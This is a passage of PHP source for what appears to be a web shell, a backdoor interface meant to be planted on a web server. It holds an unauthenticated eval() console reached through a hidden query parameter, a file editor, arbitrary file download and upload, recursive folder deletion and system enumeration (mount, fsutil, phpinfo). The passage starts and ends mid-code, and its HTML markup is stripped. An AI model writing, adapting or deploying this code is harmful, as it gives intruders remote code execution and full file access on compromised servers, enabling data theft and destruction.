open($destination, ZIPARCHIVE::CREATE))
return false;
$src = str_replace("\\", '/', realpath($src));
if (is_dir($src) === true)
{
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src), RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file)
{
$file = str_replace("\\", '/', $file);
if (in_array(substr($file, strrpos($file, '/') + 1), array('.', '..')))
continue;
$file = realpath($file);
if (is_dir($file) === true)
{
$zip->addEmptyDir(str_replace($src.'/', "", $file.'/'));
}
else if (is_file($file) === true)
{
$zip->addFromString(str_replace($src.'/', "", $file), file_get_contents($file));
}
}
}
else if (is_file($src) === true)
{
$zip->addFromString(basename($src), file_get_contents($src));
}
}
// HEX Dump
function hex_dump($data)
{
$dump = '
';
$hex = str_split(bin2hex($data), 34);
$c = count($hex);
// Offset
$offset = 0;
for ($i = 0; $i < $c; ++$i, $offset += 17)
{
$dump .= '';
$dump .= '' . sprintf('%6X', $offset) . ' ';
$dump .= ' ';
}
$dump .= '
';
// HEX
$dump .= '';
for ($i = 0; $i < $c; ++$i)
{
$dump .= '';
$ex = str_split($hex[$i], 2);
for ($b = 0, $m = count($ex); $b < $m; ++$b)
{
$dump .= '' . $ex[$b] . ' ';
}
$dump .= ' ';
}
$dump .= '
';
// ASCII
$ascii = "";
for ($i = 0, $to = strlen($data); $i < $to; ++$i)
{
if (ord($data[$i]) >= 32)
$ascii .= $data[$i];
else
$ascii .= '.';
}
$ascii = str_split($ascii, 17);
$dump .= '';
for ($i = 0, $c = count($ascii); $i < $c; ++$i)
{
$dump .= '';
for ($b = 0, $m = strlen($ascii[$i]); $b < $m; ++$b)
{
$ii = htmlspecialchars($ascii[$i][$b], ENT_QUOTES, 'utf-8');
$dump .= '' . (($ii == ' ') ? ' ' : $ii) . ' ';
}
$dump .= ' ';
}
$dump .= '
';
return $dump;
}
// Gets file permissions
function get_perms($filename, $numeric = false)
{
$perms = fileperms($filename);
if ($numeric === true)
return substr(sprintf('%o', $perms), -4);
if (($perms & 0xC000) == 0xC000) $info = 's'; // socket
elseif (($perms & 0xA000) == 0xA000) $info = 'l'; // symbolic link
elseif (($perms & 0x8000) == 0x8000) $info = '-'; // regular
elseif (($perms & 0x6000) == 0x6000) $info = 'b'; // block special
elseif (($perms & 0x4000) == 0x4000) $info = 'd'; // directory
elseif (($perms & 0x2000) == 0x2000) $info = 'c'; // character special
elseif (($perms & 0x1000) == 0x1000) $info = 'p'; // FIFO pipe
else
$info = 'u'; // unknown
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 's' : 'x') : (($perms & 0x0200) ? 'S' : '-'));
return $info;
}
// Returns disk drive letters
function get_disks()
{
if (!function_exists('shell_exec'))
return null;
// Windows
if (php_uname('s') == 'Windows NT')
{
$disks = `fsutil fsinfo drives`;
$disks = str_word_count($disks, 1);
if ($disks[0] != 'Drives')
return null;
array_shift($disks);
foreach ($disks as $key => $val)
{
$disks[$key] = $val . ':/';
}
return $disks;
}
// Unix
$data = explode(' ', `mount`);
$disks = array();
foreach ($data as $val)
{
if (substr($val, 0, 5) == '/dev/')
{
$disks[] = $val;
}
}
return $disks;
}
// Gets file owner
function get_owner($filename)
{
$u = fileowner($filename);
if (function_exists('posix_getpwuid'))
{
return ($u !== false ? posix_getpwuid($u) : $u);
}
return $u;
}
// Returns file group
function get_group($filename)
{
$g = filegroup($filename);
if (function_exists('posix_getgrgid'))
{
return ($g !== false ? posix_getgrgid($g) : $g);
}
return $g;
}
// Icons for files
function file_icon($filename)
{
$ext = pathinfo($filename, PATHINFO_EXTENSION);
$exts = array('aac', 'ai', 'aiff', 'avi', 'bmp', 'c', 'cpp', 'css', 'dat', 'dmg', 'doc', 'dotx', 'dwg', 'dxf', 'eps', 'exe', 'flv', 'gif', 'h', 'hpp', 'html', 'ics', 'iso', 'java', 'jpg', 'key', 'mid', 'mp3', 'mp4', 'mpg', 'odf', 'ods', 'odt', 'otp', 'ots', 'ott', 'pdf', 'php', 'png', 'ppt', 'psd', 'py', 'qt', 'rar', 'rb', 'rtf', 'sql', 'tga', 'tgz', 'tiff', 'txt', 'wav', 'xls', 'xlsx', 'xml', 'yml', 'zip');
$name = basename($filename);
if ($name == '.')
$icon = 'go_up.png';
elseif ($name == '..')
$icon = 'left.png';
elseif (is_dir($filename))
$icon = 'folder.png';
elseif (!in_array($ext, $exts))
$icon = '_blank.png';
else
$icon = $ext.'.png';
return ' ';
}
// Download file
function download($filename)
{
if (file_exists($filename))
{
header('Content-Description: File download');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($filename));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length:' . filesize($filename));
ob_clean();
flush();
readfile($filename);
exit();
}
return false;
}
// File size
function fsize($size, $precision = 2)
{
$sizes = array('Bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
if ($size == 0)
return 'N/A';
$exp = floor(log($size, 1024));
$size = round(($size / pow(1024, $exp)), $precision);
return $size . ' ' . $sizes[$exp];
}
// hex2bin
if (!function_exists('hex2bin'))
{
function hex2bin($h)
{
if (!is_string($h))
return null;
$r = "";
for ($i = 0, $to = strlen($h); $i < $to; $i += 2)
{
$r .= chr(hexdec($h[$i] . $h[$i + 1]));
}
return $r;
}
}
// Remove files from a folder
function g3rmdir($dir)
{
if (!is_dir($dir))
return false;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file)
{
if (is_dir($dir . '/' . $file))
g3rmdir($dir . '/' . $file);
else
unlink($dir . '/' . $file);
}
return rmdir($dir);
}
// Get mime type (only for codemirror)
function get_mime_type($filename)
{
$types = array(
'pl' => 'text/x-perl',
'pas' => 'text/x-pascal',
'sql' => 'text/x-mysql',
'tpl' => 'text/x-smarty',
'ini' => 'text/x-ini',
'txt' => 'text/x-rst',
'htm' => 'text/html',
'html' => 'text/html',
'xhtml' => 'text/html',
'shtml' => 'text/html',
'php' => 'application/x-httpd-php',
'css' => 'text/css',
'js' => 'text/javascript' );
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (array_key_exists($ext, $types))
return $types[$ext];
return 'text/plain';
}
// Writes to file a binary string
function write_file($filename, $content, $mode = 'wb')
{
if ($fp = fopen($filename, $mode))
{
$packed = pack('h*', bin2hex($content));
fputs($fp, $packed);
fclose($fp);
return true;
}
return false;
}
// Reads binary string from a file
function read_file($filename)
{
if (file_exists($filename))
{
$un = unpack('h*', file_get_contents($filename));
return hex2bin($un[1]);
}
return false;
}
// ----------------- SHELL SCRIPT -----------------
ob_start();
// This file name
$shell_file = basename(__FILE__);
// Downloads any file
if (isset($_GET['dwnl']))
{
$dwnl = base64_decode(urldecode($_GET['dwnl']));
download($dwnl);
exit();
}
// Run ...
try
{
if (isset($_GET['eV41']))
{
$codemirror = 'php';
$result = 'Execute PHP Code '.
'';
if (isset($_POST['code']))
{
$code = trim($_POST['code']);
$code = preg_replace('/^<\?php/', "", $code);
$code = trim($code);
ob_clean();
eval($code);
$c = ob_get_contents();
ob_clean();
$result .= 'Result ' . htmlspecialchars($c) . '
';
}
}
elseif (isset($_POST['command']) || isset($_GET['viewer']))
{
$commands = isset($_POST['command']) ? $_POST['command'] : "";
$commands = explode(' ', trim($commands));
if (!isset($commands[0]))
throw new Exception('Please write any command!');
$command = preg_replace('/[^a-z]/', "", strtolower($commands[0]));
// Directory, file viewer
if (isset($_GET['viewer']) && in_array($command, array("", 'hexdump', 'fileinfo', 'back', 'upload')))
{
$view = base64_decode(urldecode($_GET['viewer']));
if (!is_readable($view))
throw new Exception('Can`t open destination!');
$type = ((is_file($view)) ? 'file' : (is_dir($view) ? 'dir' : 'unknown'));
if ($type == 'file')
{
if ($command == 'back')
{
$url = urlencode(base64_encode(str_replace("\\", '/', dirname($view))));
header('Location: ' . $shell_file . '?viewer=' . $url);
exit();
}
$ext = pathinfo($view, PATHINFO_EXTENSION);
if (in_array($ext, $file_img_exts))
{
$result = '' .
'
Image viewer ' .
'
' .
'
' .
'';
}
elseif (in_array($ext, $file_editor_exts))
{
if (!is_readable($view))
throw new Exception('Can`t read this file!');
$result = 'File editor ';
if (isset($_POST['save']))
{
if (!is_writable($view))
$result .= 'Can`t write to this file! ';
else
{
file_put_contents($view, $_POST['code']);
$result .= 'Saved! ';
}
}
$codemirror = get_mime_type($view);
$result .= '' .
'' .
htmlspecialchars(file_get_contents($view)) .
' ' .
' ' .
' ' .
' ' .
' ';
}
if (isset($_POST['back']))
{
$url = urlencode(base64_encode(str_replace("\\", '/', dirname($view))));
header('Location: ' . $shell_file . '?viewer=' . $url);
exit();
}
if (isset($_POST['download']))
{
download($view);
}
if (!isset($result))
$result = 'Unknown filetype... ' .
'' .
' ' .
' ' .
' ';
switch ($command)
{
default:
$result .= 'File information ' .
'' .
'Name ' . basename($view) . ' ' .
'Path ' . $view . ' ' .
'Permissions ' . get_perms($view) . ' ' .
'Size ' . fsize(filesize($view)) . ' ' .
'Owner/Group ' . (get_owner($view) . '/' . get_group($view)) . ' ' .
'Create time ' . date('Y.m.d H:i:s', filectime($view)) . ' ' .
'Access time ' . date('Y.m.d H:i:s', fileatime($view)) . ' ' .
'Modify time ' . date('Y.m.d H:i:s', filemtime($view)) . ' ' .
'MD5 Hash ' . md5_file($view) . ' ' .
'SHA1 Hash ' . sha1_file($view) . ' ' .
'
';
break;
case 'hexdump':
$result .= 'Hex Dump ' . hex_dump(file_get_contents($view));
break;
}
}
elseif ($type == 'dir')
{
$dir = (file_exists($view)) ? $view : '.';
$dir = str_replace("\\", '/', realpath(rtrim($dir, '/'))) . '/';
if (!is_dir($dir))
throw new Exception('This is not a directory!');
if (!is_readable($dir))
throw new Exception('Cant`t open this directory, because of Access denied!');
$list = scandir($dir, ((isset($_GET['order']) && $_GET['order'] == 'desc') ? SCANDIR_SORT_DESCENDING : SCANDIR_SORT_ASCENDING));
$total = ($list !== false) ? count($list) : 0;
if ($total == 0)
throw new Exception('This directory is empty!');
// Order directory files
$dr = array();
$dr['head'] = $dr['dirs'] = $dr['links'] = $dr['files'] = array();
foreach ($list as $filename)
{
$name = basename($filename);
$filename = $dir . $name;
$readable = (is_readable($filename) ? true : false);
if ($name == '.' || $name == '..')
{
$drname = urlencode(base64_encode($filename));
if ($readable)
{
$dr['head'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => date('Y.m.d H:i:s', filemtime($filename)),
'owner' => get_owner($filename) . '/' . get_group($filename),
'perms' => get_perms($filename),
'size' => fsize(filesize($filename)) );
}
else
{
$dr['head'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => 'Unknown ',
'owner' => 'Unknown ',
'perms' => 'u--------- ',
'size' => 'N/A ' );
}
}
elseif (is_link($filename))
{
$drname = urlencode(base64_encode($filename));
if ($readable)
{
$dr['links'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' => ' . readlink($filename) . ' ',
'modify' => date('Y.m.d H:i:s', filemtime($filename)),
'owner' => get_owner($filename) . '/' . get_group($filename),
'perms' => get_perms($filename),
'size' => fsize(filesize($filename))
);
}
else
{
$dr['links'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' => ???',
'modify' => 'Unknown ',
'owner' => 'Unknown ',
'perms' => 'u--------- ',
'size' => 'LINK ' );
}
}
elseif (is_dir($filename))
{
$drname = urlencode(base64_encode($filename));
if ($readable)
{
$elements = count(glob($filename . '/*'));
$dr['dirs'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => date('Y.m.d H:i:s', filemtime($filename)),
'owner' => get_owner($filename) . '/' . get_group($filename),
'perms' => get_perms($filename),
'size' => $elements . ' ' . ($elements % 10 == 1 ? 'element' : 'elements')
);
}
else
{
$dr['dirs'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => 'Unknown ',
'owner' => 'Unknown ',
'perms' => 'u--------- ',
'size' => 'N/A ' );
}
}
elseif (is_file($filename))
{
$drname = urlencode(base64_encode($filename));
if ($readable)
{
$dr['files'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => date('Y.m.d H:i:s', filemtime($filename)),
'owner' => get_owner($filename) . '/' . get_group($filename),
'perms' => get_perms($filename),
'size' => fsize(filesize($filename))
);
}
else
{
$dr['dirs'][] = array(
'filename' => file_icon($filename) . ' ' . $name . ' ',
'modify' => 'Unknown ',
'owner' => 'Unknown ',
'perms' => 'u--------- ',
'size' => 'N/A ' );
}
}
}
// Merge
$merged = array_merge($dr['head'], $dr['dirs'], $dr['links'], $dr['files']);
// Directories
$e = explode('/', rtrim($dir, '/'));
if (($c = count($e)) > 0)
{
$directories = $v = "";
for ($i = 0; $i < $c; ++$i)
{
$v .= $e[$i] . '/';
$vdir = urlencode(base64_encode($v));
$directories .= '' . $e[$i] . ' /';
}
}
else
$directories = '' . $dir . ' ';
// PC Hard drive
$pc_total = fsize(disk_total_space($dir));
$pc_free = fsize(disk_free_space($dir));
$pc_used = round($pc_free * 100 / $pc_total, 2);
// Drives
$drvs = "";
$disks = get_disks();
if (count($disks) > 0)
{
foreach ($disks as $drive)
{
$drvs .= '' . $drive . ' ';
}
}
$result = 'Directory viewer ';
if ($command == 'upload')
{
$max_upload = (int)ini_get('upload_max_filesize');
$max_post = (int)ini_get('post_max_size');
$mem_limit = (int)ini_get('memory_limit');
$max = min($max_upload, $max_post, $mem_limit);
if (isset($_POST['submit']))
{
if (!is_writable($view))
throw new Exception('Directory is not writeable!');
if (empty($_FILES['ufile']))
throw new Exception('Please select a file!');
if ($_FILES['ufile']['size'] > $max * 1024 * 1024)
throw new Exception('File is too big!');
$codes = array(
0 => 'There is no error, the file uploaded with success',
1 => 'The uploaded file exceeds the upload_max_filesize directive in php.ini',
2 => 'The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form',
3 => 'The uploaded file was only partially uploaded',
4 => 'No file was uploaded',
6 => 'Missing a temporary folder' );
if ($_FILES['ufile']['error'] !== UPLOAD_ERR_OK)
throw new Exception('Error: ' . $codes[$_FILES['ufile']['error']]);
$tmp_file = $view . '/' . $_FILES['ufile']['name'];
if (file_exists($tmp_file) && (!isset($_POST['overwrite'])))
throw new Exception('File already exists!');
if (!move_uploaded_file($_FILES['ufile']['tmp_name'], $tmp_file))
throw new Exception('Couldn`t upload file!');
header('Location: ' . $shell_file . '?viewer=' . $_GET['viewer'] . '&succup');
exit();
}
else
{
$result .= 'Upload file ' .
'Max file size: ' . $max . ' MB ' .
'' .
'' .
'Select a file: ' .
' ' .
' ' .
' Owerwrite? ' .
' ' .
' ' .
'
' .
' ';
}
}
if (isset($_GET['succup']))
$result .= 'File was successfully uploaded! ';
// Display table
$result .= $directories . ' ' .
'Free ' . $pc_free . ' of ' . $pc_total . ' (' . $pc_used . '%) ' .
((!empty($drvs)) ? ' All drives: ' . $drvs : "") .
'' .
'' .
'Name ' .
'Size ' .
'Modify ' .
'Owner/Group ' .
'Perms ' .
' ';
for ($i = 0, $c = count($merged); $i < $c; ++$i)
{
$result .= '' .
'' . $merged[$i]['filename'] . ' ' .
'' . $merged[$i]['size'] . ' ' .
'' . $merged[$i]['modify'] . ' ' .
'' . $merged[$i]['owner'] . ' ' .
'' . $merged[$i]['perms'] . ' ' .
' ';
}
$result .= '
';
}
else
throw new Exception('Unknown type!');
}
elseif (in_array($command, array('show', 'rm', 'viewer', 'eval')))
{
switch ($command)
{
case 'viewer':
$url = urlencode(base64_encode('.'));
header('Location: ' . $shell_file . '?viewer=' . $url);
exit();
break;
case 'eval':
header('Location: ' . $shell_file . '?eV41');
exit();
break;
case 'show':
if (!isset($commands[1]) || empty($commands[1]))
throw new Exception('Bad command params!');
$commands[1] = strtolower($commands[1]);
if ($commands[1] == 'php_version')
$result = 'This site PHP Version: ' . phpversion() . ' ';
elseif ($commands[1] == 'loaded_extensions')
{
$result = 'Loaded extensions ' .
'Extension name Version ';
foreach (get_loaded_extensions() as $i => $extension)
{
$version = phpversion($extension);
$result .= '' . $extension . ' ' . (($version === false) ? 'not found ' : '' . $version . ' ') . ' ';
}
$result .= '
';
}
elseif ($commands[1] == 'phpinfo')
{
ob_start();
phpinfo();
$ogc = ob_get_contents();
$ogc = str_replace(array('', '', 'phpinfo() ', '', '
' ), "", $ogc);
if (preg_match("~
" method="post">
Enter a command:
' . $result . '
'; } ?>